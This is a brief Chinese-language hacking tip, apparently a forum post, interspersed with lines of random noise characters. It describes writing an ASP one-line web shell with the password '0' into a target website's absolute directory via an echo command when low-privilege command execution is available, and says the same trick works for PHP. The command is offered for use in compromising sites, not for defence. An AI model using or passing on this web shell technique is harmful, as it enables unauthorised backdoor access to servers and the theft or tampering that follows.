在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
# X0 I+ C! d0 m" X5 d. p% t5 j# {. `
9 T7 ^% A! H+ z/ } j8 }" n ], y命令格式& f0 s: {7 x9 M
6 a& S) H! n. B6 W" _' f e" O
Echo 语句 >目标站绝对目录
! z4 \ R" D0 L9 k0 {+ Y* Z9 v& z! ]- q
例如: + g! p. I1 @. e' z( i7 q6 v/ h
, a0 W2 \! I* c# v: u. K8 [; Jecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp: v" m: N/ i7 H1 z+ i3 k* Z% ^$ _- p' S
: b- \/ O! v2 i) `# P
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。% Q" x6 Z6 \6 X6 e( `
|